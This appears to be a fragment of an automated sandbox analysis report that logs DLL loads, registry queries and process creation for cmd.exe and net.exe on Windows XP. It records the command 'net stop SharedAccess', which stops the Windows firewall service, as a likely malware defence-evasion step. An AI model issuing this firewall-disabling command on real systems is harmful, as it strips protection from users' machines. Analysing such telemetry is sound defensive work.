\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	990000	45056	own pid	readonly	success or wait	1	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
536	C:\WINDOWS\system32\net.exe	net stop SharedAccess	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1976	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1586986915
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1586998787
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1586999799
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1587000533
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1587001162
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1587020311
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1587023570
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1587024485
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1587037688
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1587041968
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1587051478
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1587053624
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1587055867
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1587059644
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1587062648
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1587067146
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1587075970
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1587082246
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1587090494
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1587097472
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1587103074
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1587105472
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1587111717
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1587119326
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1587125137
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1587134779
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1587160887
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1587162770
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1587164533
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1587254125
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1587293737
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1587295542
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1587304051
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1587307851
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1587309612
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1587338705
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1587350661
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	1587379447
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	1587379960
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	1587380223
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	1587380482
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	1587380933
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	success or wait	1587381193
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	success or wait	1587381450
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	1587381962
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	1587382232
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	1587382490
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	1587382943
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	1587383203
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	object name not found	1587383461
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	object name not found	1587383910
Memory allocated	PID: 1976 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1587386299
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1587402487
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1587405957
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1587407840
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1587413006
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1587427229
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1587429292
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1587433981
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1587436045
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: 990000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1587464619
Process created	PID: 536 Path: C:\WINDOWS\system32\net.exe Cmdline: net stop SharedAccess Createflags: suspended	success or wait	1587468836

Analysis File: net.exe PID: 536 Parent PID: 1976

Sections

General
Start time:	07:41:11
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net stop SharedAccess
Imagebase:	0x1000000
File size:	42496 bytes
MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	8C0000	126976	own pid	readonly	success or wait	1	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1756	C:\WINDOWS\system32\net1.exe	net1 stop SharedAccess	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1588053042
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1588062846
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1588064353
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1588065232
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1588065869
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1588071044
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1588075931
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1588078776
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1588084797
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1588095185
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1588100660
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1588104229
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1588105374
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1588114243
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1588118827
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1588128595
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1588130662
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1588132505
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1588138707
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1588149045
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1588173681
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1588181781
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1588187274
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1588190275
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1588197094
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1588220974
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1588227815
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1588238618
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1588265554
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1588267825
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1588269705
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1588350460
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1588393456
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1588395863
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1588403556
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1588405809
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1588407175
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1588436750
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1588447482
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1588473094
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1588475651
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1588477673
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1588489902
